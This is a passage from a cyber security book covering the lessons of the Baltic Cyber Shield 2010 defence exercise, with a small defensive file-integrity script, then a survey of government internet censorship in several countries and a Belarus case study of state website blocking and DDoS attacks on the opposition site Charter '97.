discussions with the WT, i.e., not the in-game email system, which it assumed might be compromised. Finally, the winning BT was suc- cessful in finding and disabling preexisting GT-installed malware.217 216 The RT may have gotten lucky while examining the SCADA Modbus protocol with their fuzzing tools. 217 Preexisting malware can simulate what a Rapid Response Team would likely find on any computer network. 61 Cyber Security: A Technical Primer BCS 2010 also highlighted the value of numerous current OS-hardening tools and techniques. For Linux computers, these included AppArmor, Samhain, and custom short shell scripts; for Windows, Active Directory (AD) group policies, the CIS SE46 Computer Integrity System, Kernel Guard, and the central collection of event logs. 
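The "custom short shell scripts" and integrity checkers such as Samhain mentioned above boil down to the same idea: record a known-good fingerprint of sensitive files and alert on any drift, including the crontab tampering the RT relied on. A minimal equivalent is sketched below (in Python rather than shell, purely for illustration); the watched paths are illustrative, not the teams' actual configurations.

```python
import hashlib
import json
import os
import sys

WATCHED_PATHS = ["/etc/passwd", "/etc/crontab", "/var/www/html/index.html"]  # illustrative
BASELINE_FILE = "baseline.json"

def file_digest(path: str) -> str:
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def snapshot() -> dict:
    return {p: file_digest(p) for p in WATCHED_PATHS if os.path.exists(p)}

if __name__ == "__main__":
    if "--init" in sys.argv:        # record the known-good state once
        with open(BASELINE_FILE, "w") as fh:
            json.dump(snapshot(), fh)
    else:                           # later runs report any drift
        with open(BASELINE_FILE) as fh:
            baseline = json.load(fh)
        for path, digest in snapshot().items():
            if baseline.get(path) != digest:
                print(f"CHANGED: {path}")
```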
For all OSs, the white/black-listing and blocking/black hole-routing of offending IP addresses, on a case-by-case basis, proved invaluable.

The Cooperative Cyber Defence Centre of Excellence (CCD CoE), the Swedish National Defence College (SNDC), and the Swedish Defence Research Agency (FOI) believe that BCS 2010 accomplished its three primary goals.

First, the GT network infrastructure provided a sufficiently robust environment for a rare "live fire" CDX that offered six professional BTs the opportunity to defend CII and SCADA-enabled computer networks against a highly-motivated, capable RT. All teams were fully occupied throughout the two-day exercise, and very little downtime was reported. Further, the BCS 2010 scenario described a "cyber terrorist" threat that may already endanger the national security of governments around the world.218

Second, BCS 2010 was a truly international exercise. Because cyber attacks can be launched from anywhere in the world and are likely to traverse third-party countries en route to a target, it is critical to develop cross-border relationships before an international crisis occurs. In BCS 2010, over 100 personnel from seven countries participated. Numerous international partnerships were either established or strengthened during the course of this project.

Third, BCS 2010 conducted a post-exercise participant survey with a view toward providing a list of lessons learned to future CDXs around the world.219 Here are the highlights:

• There should be at least one WT member per BT and two WT members on the RT to allow for sufficient observation, communication, adjudication, and clarification on scoring.
• The WT should include a cyber-savvy lawyer to shed light on the legality of unscripted attack and defense scenarios.
• Each BT must have at least one full-time WT-appointed "dumb user" active on the virtual network to make client-side attacks possible.220 In BCS 2010, the RT did not have the chance to use a powerful "zero-day" browser exploit with which it had intended to target the virtual power company employees.
• Prior to a "live-fire" CDX, all participants should devote one full day to testing connectivity, bandwidth, passwords, cryptographic keys, etc., and for clarification on rules and scoring.
• The VMware Server Console was too slow for the high demands BCS 2010 placed upon it, and it cannot be recommended to other CDXs.
• The WT/GT should grant the BTs some network administration rights over their physical machines in the CDX environment. Otherwise, installing and patching software can be too time-consuming.
• A "wanton destruction" phase (i.e., one without a clearly defined purpose and certain limits on the RT) will likely destroy the game itself and so for most CDX scenarios cannot be recommended.
• In a project this big, some egos and agendas are bound to clash. It is important to designate diplomatic yet authoritative personalities, who can meet team-oriented deadlines, from the beginning.

218 "Remarks..." 2009; "Cyber War..." 2009.
219 The author gave a BCS 2010 presentation at DEF CON 18: www.defcon.org/html/links/dc-archives/dc-18-archive.html#Geers.
220 This cannot be an integral BT member due to the obvious conflict of interest.

Finally, one of the lessons of BCS 2010 is that many of the challenges inherent in conducting a robust CDX mirror the challenges of managing both IT and cyber security in the real world.
Cyberspace is complicated, polymorphic, dynamic, and evolv- ing quickly. Cyber defenders may never see the same attack twice. Furthermore, the intangible nature of cyberspace can make the calculation of victory, defeat, and battle damage a highly subjective undertaking. Therefore, believe it or not, both in the laboratory and in the real world, even knowing whether one is under cyber at- tack can be a challenge. Chapter 3 has introduced the reader to the highly technical nature of cyber security at the tactical level. Chapter 4 will show how cyber attacks have impacted the real world, even at the strategic level. 63 Cyber Security: Real-World Impact 4. CYBER SECURITY: REAL-WORLD IMPACT Chapter 3 described a wide range of technical challenges to securing the Inter- net and revealed that even our national critical infrastructures are at risk. But it is always important to correlate theoretical discussion with real-world events. Have cyber attacks truly had an influence at the highest levels of government? To what extent have they impacted national security? Cyber Security and Internal Political Security221 National security begins at home. No government can worry about foreign threats or adventures before it feels secure within its own borders. In terms of domestic security, a major consideration for many governments is infor- mation management, if not information control. The most famous example comes from fiction. In 1949, in his novel Nineteen Eighty-Four George Orwell imagined a government that waged full-time information warfare against its own citizens, with the aid of two-way Internet-like “telescreens.”222 Unfortunately, in 2011 some countries are not far from Orwell’s vision, and media carry only stories that are carefully crafted by government censors. For example, in North Korea, the world’s most repressive and isolated country, the perceived threat to stability from unrestricted access to the Internet is prohibitively high. Television and radio carry only government channels, and there is an Orwellian “national inter- com” wired into residences and workplaces throughout the country through which the government provides information to its citizens. North Korea’s aging leader, Kim Jong-il, is said to be fascinated with the IT revolu- tion. In 2000, he gave visiting U.S. Secretary of State Madeleine Albright his per- sonal email address. However, computers are unavailable to ordinary North Korean citizens, and it is believed that only a small circle of North Korean leadership have free access to the Internet. 221 This chapter consists of an updated section from a 2007 paper, “Greetz from Room 101,” written and presented by the author at DEF CON 15 and Black Hat. It contains material from Reporters without Borders (www.rsf.org), OpenNet Initiative (www.opennet.net), Freedom House (www.freedomhouse. org), Electronic Frontier Foundation (www.eff.org), ITU Digital Access Index (www.itu.int), and Central Intelligence Agency (www.cia.gov). For example, RSF assessments are based on a combination of “murders, imprisonment or harassment of cyber-dissidents or journalists, censorship of news sites, existence of independent news sites, existence of independent ISPs, and deliberately high connection charges.” 222 Orwell, 2003 (originally written in 1949). 64 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Each year, one hundred male students as young as 8 years old are chosen to at- tend the Kumsong computer school, where the curriculum consists of computer programming and English. 
The students are not allowed to play games or access the Internet, but they do have an instant messaging system within the school. According to the South Korean Chief of Military Intelligence, some top graduates from the Kim Il-Sung Military Academy have been selected for an elite, state-spon- sored hacker unit, where they develop “cyber-terror” operations. International Internet connections run from North Korea to the rest of the world via Moscow and Beijing. They are managed at the Korea Computer Centre (KCC), estab- lished in 1990. Reports suggest that KCC downloads officially-approved research and development data, which it offers to a very short list of clients. North Korea’s official stance on Internet connectivity is that the government cannot tolerate the “spiritual pollution” of its country. However, South Korea determined that North Korea was operating a state-run cyber casino on a South Korean IP ad- dress. Since that time, South Korean companies have been barred from registering North Korean sites without government approval. According to recent statistics, North Korea is 48th in the world in population at 24.5 million. However, the country possesses only three computers which are directly connected to the Internet, so it sits at number 227 in the world in that category.223 North Korea is not alone in fearing the power of the Internet to undermine its do- mestic security. In Turkmenistan, President-for-Life Saparmurat Niyazov – the Turk- menbashi, or Father of All – died in late 2006, but his personality cult and the tightly-controlled media he left behind have had a lasting impact on the country. Information and communication technology is woefully underdeveloped. The Turk- mentelekom monopoly has allowed almost no Internet access, either from home or via cyber café. A few Turkmen organizations have been allowed to access just a handful of officially-approved websites. In 2001, of all the countries of the former Soviet Union, Turkmenistan had the fewest number of IT-certified personnel – fifty- eight. In addition, the CIA reported in 2005 that there were only 36,000 Internet users, out of a population of 5 million. In 2006, a Turkmen journalist who had worked with Radio Free Europe died in prison, only three months after being jailed. Despite repeated European Union (EU) demands, there has been no investigation into the incident. 223 CIA World Factbook, 9 March, 2011. 65 Cyber Security: Real-World Impact Foreign embassies and non-governmental organizations furnish their own Internet access. In the past they have offered access to ordinary Turkmen, but it was too dangerous for the average citizen to accept the offer. Following Niyazov’s death, Gurbanguli Berdymukhamedov was elected president224 with a campaign promise to allow unrestricted access to the Internet. And within days, two cyber cafés opened in the capital. A visiting AP journalist reported easy access to international news sites, including those belonging to Turkmen political opposition groups. However, the price per hour was $4, exorbitant in a country where monthly income is under $100. Today, Turkmenistan has a population of 5 million. Unfortunately, under 100,000, or under 2%, are believed to have Internet access.225 On the bright side, computer hardware is available in Turkmenistan, and computer gaming is popular. Also, the use of satellite TV is on the rise, which could be used to improve Internet connectiv- ity in the future. 
The world’s largest and most sophisticated Internet surveillance belongs to the Peo- ple’s Republic of China (PRC), which employs an army of public and private226 cyber security personnel to keep watch over its citizens. The PRC has strict controls on access to the World Wide Web, and policemen are stationed at cyber cafés, which track patrons’ usage for 60 days. The “Great Firewall” is designed specifically to prevent the free flow of information in and out of the country, including content related to politics, human rights, reli- gion, and pornography. Some sites, such as Google and BBC, have been completely blocked for a period of time. Search results are believed to be filtered by keyword at the national gateway and not by web browsers in China. The high level of sophistication in Chinese Internet surveillance is evident by the fact that some URLs have been blocked, even while corresponding top level domains (TLD) are accessible and webpage content appears consistent across the domain. This suggests active human participation in state censorship (i.e., the system is not completely automated). At the extreme end, some blog entries appear to have been edited by censors and reposted to the Web. 224 This election was not monitored by international observers. 225 CIA World Factbook, 9 March, 2011. 226 Some Western companies have been accused of too much cooperation with China on cyber control issues: Google, Yahoo, and Microsoft have all collaborated in government prosecutions. 66 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Comprehensive laws authorize government control of the media, while individual privacy statutes are unclear, in short supply, and perhaps even inapplicable in terms of information and communications technology (ICT).227 In 2007, Chinese President Hu Jintao called for a “purification” of the Internet, sug- gesting that Beijing intended to tighten its control over computer networks even further. According to Hu, new technologies such as blogging and webcasting had allowed Chinese citizens to circumvent state controls, which had negatively affected the “development of socialist culture,” the “security of information,” and the “stabil- ity of the state.” Today, China is on the cutting edge of Internet technology research. In particular, it has invested heavily in Internet Protocol version 6 (IPv6), which could be used to support a long-term strategy of user control. PRC Internet Society chairwoman Hu Qiheng has stated that China’s goal is to achieve a state of “no anonymity” in cyberspace. China’s fear of Internet freedom is shared by Cuba, whose highly educated popula- tion lacks regular access to the web. Special authorization is required to buy com- puter hardware, and Internet connection codes must be obtained from the govern- ment. This has led to a healthy cyber black market; for example, students have been expelled from school for trading in connection codes. Some Cubans have connected to the Internet from the homes of expatriates, who have in turn been threatened by the police with expulsion from the country. Cuban Decree-Law 209, written in 1996, states that “access from the Republic of Cuba to the Global Computer Network” may not violate “moral principles” or “jeop- ardize national security.” Illegal network connections can earn a prison sentence of five years, posting a counter-revolutionary article, 20 years. At least two dozen journalists are now serving up to 27 years in prison. 
As governments grow more familiar with censorship technology, they are capable of more complex decision-making. For example, at a 2006 Non-Aligned Movement summit in Havana, conference attendees had no problem connecting to the web. However, in the same year, when a human rights activist in the small village of Vi- ñales tried to open an email from Reporters Without Borders containing the names 227 However, in Asia, it is generally accepted that there is less privacy in one’s daily life, and the general populace is more comfortable with government oversight than in the West. 67 Cyber Security: Real-World Impact of Cuban dissidents, a pop-up window announced: “This programme will close down in a few seconds for state security reasons.”228 Recent statistics indicate that around 15% of Cuba’s population of 11 million is now online. However, there are only about 3,000 Internet-connected computers on the island, which is an extremely low number for 1.5 million users.229 Obviously, such a narrow funnel would make it easier for the government to monitor web communica- tions. Burma presents another extreme example of Internet paranoia. Out of a population of 50 million, only 78,000, or 0.6% of citizens, now use the web. The number of Internet-connected host computers in the country is just 42. A few cyber cafés exist, but they require name, identification number, address, and frequent screenshots of user activity to log in. Thus, online privacy is non-existent. In Burma, average citizens access not the Internet per se, but the “Myanmar Inter- net,” which hosts only a small number of officially-sanctioned business websites. Furthermore, only state-sponsored email accounts are allowed; commercial web- mail is prohibited. One of the most common ways to deny Internet access is to make it prohibitively expensive. The Burmese average annual income is $225. A broadband connection is $1,300. Dial-up, the most common form of access, is $6 for 10 hours; outside the cities of Rangoon and Mandalay, long distance fees are also required. Entrance to a cyber café is $1.50. According to the 1996 Computer Science Development Law, all network-ready com- puters must be registered with the government. Failure to do so or sharing an In- ternet connection with another person carries penalties of up to 15 years in prison. Burma’s State Peace and Development Council (SPDC) prohibits “writings related to politics,” “incorrect ideas,” “criticism of a non-constructive type,” and anything “detrimental to the ideology of the state” or “detrimental to the current policies and secret security affairs of the government.” Some international groups, such as Free Burma Coalition and BurmaNet, have cam- paigned for greater Internet freedom since 1996. But there is little resistance to Internet governance within Burma itself, due to its high level of political repression. 228 Voeux, 2006: The reporter stated that the names of the dissidents had asterisks and other punctuation marks between the letters of their names in an effort to make them illegible to government censorship software, but that “this precaution turned out to be insufficient.” However, it could be that the system was triggered by the source IP or email address of the Reporter Without Borders’ author of the email. 229 CIA World Factbook, 9 March, 2011. 
68 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Although Burma now has a population of 54 million, only around 110,000 of its citizens can connect to the web – around 0.2% - through a funnel of roughly 170 Internet-connected computers.230 In Africa, Eritrea has played an infamous role as the last country to go online and the first to go offline. In November 2000, Eritrea opened its first national gateway to the Internet, with a capacity of 512 Kbps.231 Within five years, about 70,000 people had accessed the web, mostly from a “walk-in” ISP. There was no initial censorship of the web, but in 2001, human rights in Eritrea began to deteriorate. In 2004, all cyber cafés were physically transferred to govern- ment “educational and research” centers. The official reason was to control pornog- raphy, but international diplomats are skeptical of this explanation. Historically, oral traditions in Africa have played a powerful role in fostering na- tional solidarity. Radio and clandestine radio stations in the Horn of Africa are skill- fully employed by both government and anti-government forces. One transmitter in the Sudan, for example, has hosted three separate anti-Eritrean radio stations simultaneously. Given the low level of Internet usage in Africa, political battles are slow to shift from the radio spectrum to cyberspace. However, via the web even the most paro- chial factions are able to appeal to the entire world, thereby creating international political and economic support for their cause. Sites such as Pan-African News and Eritrea Online offer a growing amount of information and analysis, and their influ- ence will only grow over time. Today, Eritrea has a population of around 6 million, of which only about 200,000 connect to the web.232 Two thousand miles to the south, the government of Zimbabwe is engaged in a deadly game of information warfare against its own citizens. In October 2006, President Robert Mugabe reportedly met with his Central Intel- ligence Organisation (CIO) for the purpose of infiltrating Zim Internet service pro- viders (ISP). Operatives were to “flush out” journalists using the Internet to send “negative” information to international media. The police worked as cyber café at- tendants and posed as web surfers. A police spokesman confirmed that the govern- ment would do “all it can” to prevent citizens from writing “falsehoods against the government.” Jail terms were up to 20 years in length. 230 CIA World Factbook, 9 March, 2011. 231 Kilobits per second. 232 CIA World Factbook, 9 March, 2011. 69 Cyber Security: Real-World Impact The Zim Interception of Communications Bill (ICB) forced ISPs to purchase special hardware and monitoring software from the government. No court challenges to government intercepts are allowed. Some ISPs threatened to shut down in protest. In terms of national telecommunications infrastructure, Zimbabwe has followed a similar path as other authoritarian governments, giving monopoly control to a state- controlled firm.233 The reason is simple – if one entity controls all gateways in and out of the country, surveillance is much easier, and the government can charge whatever price it desires. In many countries, a major challenge for the government is the speed with which millions of its citizens have connected to the web. 
In 2001, there were just 1 million Internet users in Iran; today that number has increased to over 8 million.234 Former president Ali Mohammad Khatami stated that the Iranian government has tried to have the “minimum necessary” control over the Internet. Moreover, while Muslim values are emphasized, only sites that are “truly insulting” towards Islam are censored, and political opposition sites are accessible. However, the OpenNet Initiative estimates that about one-third of all Internet sites, most often relating to politics, pornography, translation, and anonymizing software, are blocked by the Iranian government. Websites are more likely to be blocked if they are in Farsi than in English. In fact, in Iran it is technically illegal to access “non- Islamic” websites, and the maximum penalties for doing so include severe punish- ments. In addition, Iranian ISPs are required to install web- and email-filtering tools. Human rights groups, such as Reporters Without Borders, argue that since 2006 all Iranian websites have had to register with the authorities to demonstrate that they do not contain prohibited content. And many popular international sites, such as photo-sharing FlickR and video-sharing YouTube, are inaccessible for reasons of “immorality.”235 Iranian media publications are not legally allowed to contradict government goals. Media receive a list of banned subjects each week, and there is a dedicated press court. On March 14, 2011, UN secretary-general Ban Ki-moon stated that he was “deeply troubled by reports of increased executions, amputations, arbitrary arrests, unfair trials, and possible torture and ill-treatment of human rights activists, lawyers, jour- nalists, and opposition activists” in Iran. No UN human rights investigators have been allowed to visit the country since 2005. Since June 12, 2009, about 20 foreign 233 The state-owned provider in Zimbabwe is Tel*One. 234 Iran has a population of almost 80 million, 18th on the world list, but it has just 120,000 Internet- connected computers, good for 75th in the world (CIA World Factbook, 9 March, 2011). 235 Handbook..., 2008. 70 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY journalists and correspondents have been expelled from Iran. A dozen were stripped of their press cards following a demonstration in February 2011 that was organized to support the revolution in Egypt. Abdolreza Tajik, the 2010 RSF-FNAC press free- dom prize recipient, was given a six-year jail term.236 During the early-2011 unrest across the Middle East, Iranian authorities increased surveillance in cyberspace. In order to obstruct anti-government protests in Feb- ruary 2011, independent and pro-opposition websites, including www.fararu.com and sahamnews.org, were blocked. Prior to anti-regime demonstrations, broadband speed has slowed down enormously. Mobile phone and text-message traffic was disrupted. Satellite TV broadcasts, especially relating to news about the revolution in Egypt, were jammed. Finally, in an effort to reduce the number of calls for protest, the name of the Persian month “bahman” (roughly corresponding to February 2011) was censored.237 Iranian citizens are Internet savvy, and this should hinder government attempts to control Iranian cyberspace in the future. Since 2000, blogging has become both a mainstream and an alternative form of communication, and even President Mahmud Ahmadinejad has his own blog. In August 2004, when a number of reformist news sites were blocked, their content was quickly mirrored on other domains. 
An anony- mous system administrator posted an alleged official blacklist of banned sites. And reformist Iranian legislators have openly complained about censorship, even post- ing their criticisms online. In the Internet age, the power of communications within civil society to overwhelm government stability has risen to new heights. In a classic coup d’état, the national television, radio station and printing press were among the first paramilitary objec- tives. But the Internet has changed the rules of the game. Now anyone who owns a personal computer and a connection to the Internet possesses both a printing press and a radio transmitter in their own home. Furthermore, the entire world is potentially their audience. Authoritarian governments, within their borders, will attempt to pare down the In- ternet to a manageable size, both in terms of physical infrastructure (e.g., no un- monitored Internet cafes) and information content (censorship). Common laws gov- 236 “Human rights investigators...” 2011. 237 “Regime steps up censorship...” 2011. 71 Cyber Security: Real-World Impact erning information and communications technology (ICT) are likely to include the following: • all Internet accounts must be officially registered with the state, • all Internet activity must be directly attributable to individual accounts, • users may not share or sell Internet connections, and • users may not encrypt their communications. Clearly the Internet is a powerful tool in the hands of a despot. Through a monop- oly of state-owned and operated telecommunications, the government can conduct country-wide and international ICT surveillance,238 including information manipula- tion, even with some plausible deniability. Further, the government has an effective means to deliver political messages directly to its citizens, while at the same time denying that opportunity to rival political factions. Thus, network security designed for law enforcement purposes can be used not only to catch criminals but also to target political adversaries. A challenge for any government – including those run by dictators – is to find a balance between too much and too little freedom of information. Although govern- ments must be given appropriate law enforcement powers, there may be tempta- tions to abuse them, and risks will follow. Governments like those in North Korea are doomed to fail eventually. The Internet – and human beings – thrive on the open exchange of information. If civil society is not given sufficient freedom to flourish, the regime will die. In the Internet era, choking online freedom likely also entails choking long-term economic prospects, which will in turn threaten political stability. In the next chapter, the author has translated a first-person account, written in Rus- sian by a Belarusian computer expert, which examines the ongoing battle in cyber- space between government authorities and civil society in Belarus. 238 For the international communications that do not begin or end on its national territory, but still need to traverse it. 72 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Case Study: Belarus239 Foreword by Kenneth Geers240 Life in Belarus has not changed much since the Cold War. In 2001, U.S. 
Secretary of State Colin Powell called its autocratic President, Alexander Lukashenko, Europe’s “lone outlaw.”241 The Belarusian Presidential Administration directly controls nearly all media within the country.242 There are fewer than 10 professional quality printing presses outside of state control.243 Television and radio stations try to avoid news programming alto- gether – for fear of losing their license – and even Russian TV is heavily censored.244 In 2005, Freedom House ranked only Turkmenistan lower than Belarus in terms of democracy among the countries of the former Soviet Union.245 The state-owned Beltelecom monopoly is the sole provider of telephone and Internet connectivity, although about 30 national ISPs connect through Beltelecom. The only reported independent Internet link is via the government’s academic and research network, BasNet. Strict government controls are enforced on all telecommunica- tions technologies; for example, transceiver satellite antennas and IP telephony are prohibited. Beltelecom has been accused of “persecution by permit” and of requiring a demonstration of political loyalty to access its services. At least one Belarusian journalist is reported to have “disappeared.”246 As in Zimbabwe, the Beltelecom monopoly status is intended not only for govern- ment oversight, but also to maximize financial gain. It is the primary source of rev- enue for the Ministry of Communications (MIC).247 The State Center for Information Security (GCBI), in charge of domestic signals intel- ligence (SIGINT), controls the “.by” Top Level Domain (TLD) and thus manages both the national Domain Name Service (DNS) and website access in general. Formerly 239 Following the Foreword, this chapter is a translation by the author of a Russian language paper writ- ten by Fedor Pavluchenko of www.charter97.org, entitled “Belarus in the Context of European Cyber Security,” which was presented at the 2009 Cooperative Cyber Defence Centre of Excellence Confer- ence on Cyber Warfare. 240 This chapter Foreword is taken from: Geers, 2007a. 241 Kennicott, 2005. 242 Usher, 2006. 243 Kennicott, 2005. 244 “The Internet and Elections...,” 2006. 245 Kennicott, 2005. 246 “The Internet and Elections...,” 2006. 247 Ibid. 73 Cyber Security: Real-World Impact part of the Belarusian KGB, GCBI reports directly to President Lukashenko.248 De- partment “K” (for Кибер or Cyber), within the Ministry of Interior, has the lead in pursuing cyber crime. A common media offense in Belarus is defaming the “honor and dignity” of state officials249. Belarus already has a significant history of political battles in cyberspace. In 2001, 2003, 2004, and 2005, Internet access problems were experienced by websites that were critical of the President, state referenda, and/or national elections. While the government announced that website availability problems were the result of access “overload,” the opposition countered that the sites were inaccessible altogether, and that the regime was deliberately blocking access. One of the affected sites had been characterized by the Ministry of Foreign Affairs as “political pornography”.250 The biggest cyber showdown took place during the March 2006 Belarusian presi- dential elections, during which the opposition tried to use its youth and computer savvy to organize in cyberspace. 
The sitting government attempted the same, but because its supporters consisted of many rural and elderly voters who were still unconnected or new to the Internet, its efforts were uphill at best.251 Election Day 2006 provided the world an infamous example of modern-day cyber politics. As Belarusians went to the polls on March 19, thirty-seven opposition me- dia websites were inaccessible from Beltelecom.252 “Odd” DNS (Internet address) er- rors were reported, and the website of the main opposition candidate, Aleksandr Milinkevich, was “dead.” President Lukashenko won the election by a wide margin. A week later, as anti- government protestors clashed with riot police, the Internet was inaccessible from Minsk telephone numbers. A month later, when an opposition “flash-mob” was or- ganized over the Internet, arriving participants were promptly arrested by waiting policemen.253 Similar to Iran, a primary lesson from Belarus is that Internet filtering and govern- ment surveillance do not have to be comprehensive to be effective. Selective target- ing of known adversaries and increased computer network operations at critical points in time, such as during elections, can be very useful to a sitting government. 248 Ibid. 249 Kennicott, 2005.; and “Press Reference: Belarus.” 250 “The Internet and Elections...,” 2006. 251 Ibid. 252 The OpenNet Initiative confirmed that 37 of 197 tested websites were inaccessible from the Beltele- com network, but were still accessible from other computer networks. 253 Ibid. 74 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY “Belarus in the Context of European Cyber Security” Written in Russian by Fedor Pavluchenko (www.charter97.org) Translated to English by Kenneth Geers During the first decade of the 21st century, Internet censorship in Belarus has become a government tool used to combat political dissent. This ongoing cyber conflict between state and non-state actors is similar to the struggle between the Russian government and its domestic adversaries in cyberspace. State-sponsored, politically-motivated Denial of Service (DDoS) attacks against civil society are unacceptable. In Belarus, this violation of freedom of expression has become a national crisis. But the problem is not confined within these borders; it threatens the integrity of Internet resources in other European countries as well. Modern technology offers the world significantly improved communications, but it also creates novel threats. Governments can abuse their power over state-controlled infrastructures. This not only violates human rights, but it engenders long-term political instability. Democratic states in Europe should work to strengthen inde- pendent Internet institutions and extend the rule of law to the whole of European cyberspace. Alexander Lukashenko has governed Belarus as an autocrat since a disputed politi- cal referendum in 1996. His government has suppressed freedom of speech, and for over a decade there has been virtually no independent media in Belarus. The popular newspapers of the 1990s have ceased to exist or have seen their circulation greatly reduced, and independent radio stations have been closed. Sadly, there has never been an independent Belarusian television channel. The Internet, despite its high cost in Belarus, has unsurprisingly become the only source of objective information for the majority of the citizens. The number of web users has now grown to nearly one-quarter of the country’s population. 
The Charter ‘97 website has been a leading Belarusian venue for public policy dis- cussion for over a decade. However, because Charter ‘97 is known for siding with Be- larusian political dissidents, the site has been the target of myriad state-sponsored Internet information-blocking strategies. September 9, 2001: Belarusian Internet users discovered the power of a govern- ment to wage cyber warfare against its own citizens on the day of its own national presidential elections. At 1200, Beltelecom blocked access to many popular political websites. Although the prohibited sites remained accessible outside Belarus, no one in Belarus could view them until the following afternoon at 1600, when the Internet “filtering” stopped. 75 Cyber Security: Real-World Impact From a technical perspective, this type of Internet censorship is easy for a telecom- munications monopoly to perform. The data packets can be filtered at a government Internet Service Provider’s (ISP) network router, based solely on the Internet Proto- col (IP) address of the websites in question. However, it can be equally simple for an Internet user or the censored website to un- derstand exactly what is happening. For example, the “traceroute” computer network utility, which measures the paths and transit times of packets across networks, can be used to spot the exact point of network interruption. Some of the prohibited sites were hosted on servers in Belarus, within the “.by” Top Level Domain (TLD). These sites were disabled by altering their Domain Name Service (DNS) records to make them inaccessible. This is possible because “.by” is administered by the Operations and Analysis Center, a special state agency that falls under the direct control of the Belarusian President. On September 9, 2001, the fol- lowing domains were unreachable on the Belarusian web: home.by, minsk.by, org.by, unibel.by, nsys.by, and bdg.by. Numerous websites, including www.charter97.org, responded by creating “mirrors” or copies of their content at other web addresses in an effort to stay online. All such mirrors were promptly blocked by the government. Furthermore, websites that specialize in obscuring the source and destination of web searches, such as “ano- nymizers” and “proxy” servers, were also blocked. In all, over 100 websites were inaccessible. It is important to note that within Belarusian law there were no legal grounds to perform censorship of political content on the web. What happened in 2001 directly violated the constitution. Beltelekom and the Belarus Ministry of Communications both announced that the outage stemmed from too many Belarusians trying to ac- cess the affected sites at the same time, and that this led to a self-inflicted Denial of Service. But this story is easy to disprove via simple technical analysis. For its part, Belarusian government leadership had no comment, even though Inter- net censorship and computer sabotage are an offense under Belarusian law. Further- more, there was never any official investigation into the facts of this case. October 24, 2001: The Charter ’97 website was completely deleted from its web server by an unidentified computer hacker. A few days after the attack, under pres- sure from the Belarusian secret services, our hosting company broke the terms of our contract. www.charter97.org was no longer allowed space on its server. January 20, 2004: For the first time, Charter ’97 was the target of a Distributed Denial of Service (DDoS) attack. 
The DDoS followed our publication of a journalistic investigation into a possible connection between high-ranking officials from the Be- 76 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY larusian Interior Ministry – which is responsible for investigating computer crimes – and the trading of online child pornography. The DDoS attack lasted more than three weeks and was supported by a botnet that comprised more than 55,000 active IP addresses. This network of infected comput- ers spanned the globe and included machines in Latin America, the United States, South-East Asia, China, and India. The source IPs and intensity of the attack changed several times, which indicated an active command and control (C2) over the activity. Of course, it is impossible to prove that the DDoS attack was politically motivated, but external simultaneous factors corroborate this theory. On state television, a campaign of harassment targeted the employees of Charter ’97. Among other things, the employees themselves were accused of trading in online pornography. In addi- tion, Natalya Kolyada, a human rights activist working with the site, was convicted on misdemeanor charges. July 14-21, 2004: On July 14, for 2 hours, a cyber attack paralyzed the server that hosted the Charter ’97 website. It is believed that this event was a “test” to facilitate what happened one week later. On July 21, there were mass protests in Minsk to demonstrate against the 10th anni- versary of the Lukashenko government. Charter ’97 had planned to host a webcast in support of the protests. For the second time, the website came under a DDoS- attack, which began at 1400 – 4 hours before the demonstrations began – and lasted until the political protests were over. This DDoS bore strong similarities to the first attack in January of 2004. October 10, 2004: The next large-scale attempt to block Charter ’97 and other in- dependent websites occurred during parliamentary elections and a simultaneous referendum on whether to lift presidential term limits in Belarus. On the day before the election, news correspondents were not only unable to access the website, but they could not telephone Charter ’97 by mobile or landline phone. In addition, other political opposition websites were again blocked by a filter on Beltele- kom’s primary router. However, many Belarusian web users were better prepared for this attack and immediately switched to Internet proxies and anonymizers. Unfortunately, the government had a new, effective cyber weapon in its arsenal: the artificial stricture – or “shaping” – of Internet bandwidth. The use of this tactic meant that, in principle, forbidden sites were still available, but it took anywhere from 5-10 minutes for their pages to load in a browser. Thus, web users were simply unable to gain full access to Charter ’97 and other targeted sites. Non-political Inter- net resources were accessible as normal. 77 Cyber Security: Real-World Impact Neither the Ministry of Communications nor Beltelekom made any announcement regarding this incident, and no official investigation was undertaken. March 19, 2006: The next time that Belarusian websites were blocked was during the 2006 presidential elections. Anticipating the government’s strategy, Charter ’97 well before the election took place offered its visitors numerous ways to circumvent censorship in an initiative called “Free Internet.” Due in part to those efforts, Beltele- kom’s IP-filtering failed. 
However, its network “shaping,” or the selective starvation of specific streams of bandwidth, was again successfully employed. On March 18, the day before the election, a censorship “test” was conducted from 1600-1630. On election day, the sites of opposition presidential candidates, politi- cal parties, leading independent news sources, and the international blogging site www.livejournal.com, which is very popular with Belarusians, were all successfully blocked. Beltelekom announced that the service interruptions were caused by too many users trying to connect to the affected sites, but no formal investigation was undertaken. April 25-26, 2008: On the eve of massive street protests in Minsk, which Charter ’97 had intended to broadcast via live webcast, the website suffered a DDoS-attack that paralyzed its server. This was another “test,” which lasted 30 minutes.254 On April 26 – the day of the planned demonstration – the real DDoS attack began, five hours before the start of the protest. The hosting company, www.theplanet.com, was overwhelmed. Its hardware was designed to carry up to 700 Mbit/s of network traffic, but the DDoS surpassed 1 Gbit/s.255 There was no alternative but to turn off the website and simply wait for the attack to end (on the following day). Other independent online media were targeted simultaneously, including the Be- larusian-language version of “Radio Liberty.” A server hosting the opposition site, “Belarusian Partisan,” for several days came under the control of unknown hackers, who used it as a platform to publish fabricated, scandalous news stories which Be- larusian Partisan editors were forced to refute on other websites. The high level of expertise required for this attack strongly suggested the involvement of Belarusian intelligence agencies. The technical defense capabilities of the Radio Liberty server – home to its Belaru- sian, Albanian, Azerbaijani, Tajik, and Russian services – were sufficient to withstand the attack for more than 3 days. The site remained accessible, but was nonetheless 254 For about 10 minutes, the site was difficult to access, but normal traffic was restored before the attack ended. The following IP addresses were used in the attack: 89.211.3.3, 122.169.49.85, 84.228.92.1, 80.230.222.107, 212.34.43.10, 81.225.38.110, 62.215.154.167, and 62.215.117.15. 255 Megabits per second/gigabits per second. 78 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY difficult to reach, and this caused a minor diplomatic scandal. The U.S. mission to the Organization for Security and Cooperation in Europe 